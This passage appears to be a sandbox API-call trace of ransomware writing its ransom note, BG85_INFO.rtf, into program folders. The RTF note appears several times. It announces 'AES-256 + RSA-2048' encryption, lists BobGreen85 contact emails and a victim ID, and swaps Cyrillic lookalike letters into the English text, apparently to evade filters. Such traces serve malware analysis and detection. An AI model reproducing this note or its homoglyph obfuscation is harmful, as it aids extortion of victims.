\\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.553] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.554] CloseHandle (hObject=0x1fc) returned 1 [0064.554] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\bg85_info.rtf")) returned 0xffffffff [0064.554] GetLastError () returned 0x2 [0064.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.554] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.555] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.555] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS 